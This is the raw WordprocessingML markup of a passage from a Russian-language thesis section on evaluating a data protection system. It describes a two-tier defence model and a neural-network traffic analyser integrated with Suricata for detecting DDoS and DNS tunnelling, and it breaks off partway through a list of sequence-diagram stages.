    <w:p w14:paraId="0B0302B8" w14:textId="0BAEB4C1" w:rsidR="008E0171" w:rsidRPr="003770F2" w:rsidRDefault="00812517" w:rsidP="00230C61">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc231673282"/>
      <w:r>
        <w:t xml:space="preserve">1.4 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="003770F2">
        <w:t>Оценка эффективности системы защиты данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="0D8BF801" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00EB1A47" w:rsidRDefault="008E0171" w:rsidP="00967078">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1429"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DB609D1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="0096707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Согласно методике оценки угроз безопасности информации ФСТЭК д</w:t>
      </w:r>
      <w:r w:rsidRPr="000815E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ля всесторонней оценки защищенности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информационной системы</w:t>
      </w:r>
      <w:r w:rsidRPr="000815E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> принято рассматривать ее безопасность на двух независимых, но взаимосвязанных рубежах:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA36D64" w14:textId="260A5C5C" w:rsidR="008E0171" w:rsidRPr="00A31140" w:rsidRDefault="008E0171" w:rsidP="00245CF1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A31140" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00245CF1" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A31140" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ехнический</w:t>
      </w:r>
      <w:r w:rsidRPr="000815E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> рубеж включает в себя физические и аппаратно-технические средства защиты</w:t>
      </w:r>
      <w:r w:rsidR="00A31140" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A886B2" w14:textId="6D103740" w:rsidR="008E0171" w:rsidRPr="00A31140" w:rsidRDefault="008E0171" w:rsidP="008E0171">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A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00245CF1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="000815E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нформационный рубеж охватывает программно-аппаратные и алгоритмические механизмы, направленные на защиту данных </w:t>
      </w:r>
      <w:r w:rsidR="00967078" w:rsidRPr="005A1278">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000815E8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и логики работы системы</w:t>
      </w:r>
      <w:r w:rsidR="007C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07442DB0" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE05D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Модель многозвенной (или многоуровневой) защиты предполагает создание нескольких последовательных барьеров («зональных рубежей»), каждый из которых должен задержать или обнаружить атаку. Если один рубеж будет преодолен, следующий должен остановить злоумышленника.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D99764D" w14:textId="50080417" w:rsidR="008E0171" w:rsidRPr="005A1278" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE05D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для всесторонней оценки защищенности</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE05D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> принято рассматривать ее безопасность на двух независимых, но взаимосвязанных рубежах, на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE05D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>показана модель многозвенной защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002BE0AC" w14:textId="77777777" w:rsidR="00967078" w:rsidRPr="005A1278" w:rsidRDefault="00967078" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635C5F1B" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00286124" w:rsidRDefault="008E0171" w:rsidP="00967078">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008B6A5C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71FFFACE" wp14:editId="0445A86D">
            <wp:extent cx="5848350" cy="4438650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1575343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43382" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId20"/>
                    <a:srcRect t="5411" r="5012" b="4534"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848350" cy="4438650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B987AA" w14:textId="3C81C950" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="00967078">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="34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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Модель многозвенной защиты</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626383F1" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="0095287B" w:rsidRDefault="008E0171" w:rsidP="00543A2F">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:right="340"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C3041B" w14:textId="77777777" w:rsidR="00543A2F" w:rsidRPr="0095287B" w:rsidRDefault="00543A2F" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00543A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Система защиты организована по двум рубежам. Технический рубеж обеспечивает анализ сетевого трафика в реальном времени с применением искусственных нейронных сетей, обнаружение атак типа </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00543A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DDoS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00543A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, DNS-туннелирования и других поведенческих аномалий, а также интеграцию с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00543A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00543A2F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и автоматическую адаптацию к новым угрозам. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC314F" w14:textId="19280899" w:rsidR="008E0171" w:rsidRDefault="00436D60" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="00181ECB" w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Технический рубеж обеспечивает анализ сетевого трафика в реальном времени с применением нейросетевого модуля, интегрированного с </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00181ECB" w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00181ECB" w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00181ECB" w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлена диаграмма последовательности обнаружения и блокировки атаки на техническом рубеже.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5C7765" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055D336A" w14:textId="6F2DC12F" w:rsidR="008E0171" w:rsidRDefault="00A31140" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="142"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="505A806E" wp14:editId="32EDDF9D">
            <wp:extent cx="6156325" cy="3503295"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="20955"/>
            <wp:docPr id="178396143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6325" cy="3503295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A1530" w14:textId="1DCA3E0F" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="007C138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D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r w:rsidR="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="00181ECB" w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Диаграмма последовательности для технического рубежа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BCEAB" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62FEF143" w14:textId="77777777" w:rsidR="00181ECB" w:rsidRDefault="00181ECB" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная диаграмма иллюстрирует процесс обнаружения и блокировки сетевой атаки на техническом рубеже, который реализован с помощью нейросетевого плагина. Цель этого рубежа — предотвратить проникновение злоумышленника в сеть компании путём анализа сетевого трафика в реальном времени.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B381770" w14:textId="2688A3C1" w:rsidR="008E0171" w:rsidRPr="005336D7" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На диаграмме отражены следующие ключевые этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E7DE10" w14:textId="61201875" w:rsidR="008E0171" w:rsidRPr="00A31140" w:rsidRDefault="00B93B26" w:rsidP="00B93B26">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:suppressAutoHyphens/>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:r w:rsidR="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нициация атаки (Нарушитель → Атака): Злоумышленник запускает атаку, которая длится </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_нр</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 6 секунд. Это время, в течение которого атака может нанести ущерб, если не будет остановлена</w:t>
      </w:r>
      <w:r w:rsidR="00A31140" w:rsidRPr="00A31140">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373EAC08" w14:textId="19798188" w:rsidR="008E0171" w:rsidRPr="00B93B26" w:rsidRDefault="00B93B26" w:rsidP="00B93B26">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:suppressAutoHyphen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w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">нализ трафика (Атака → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
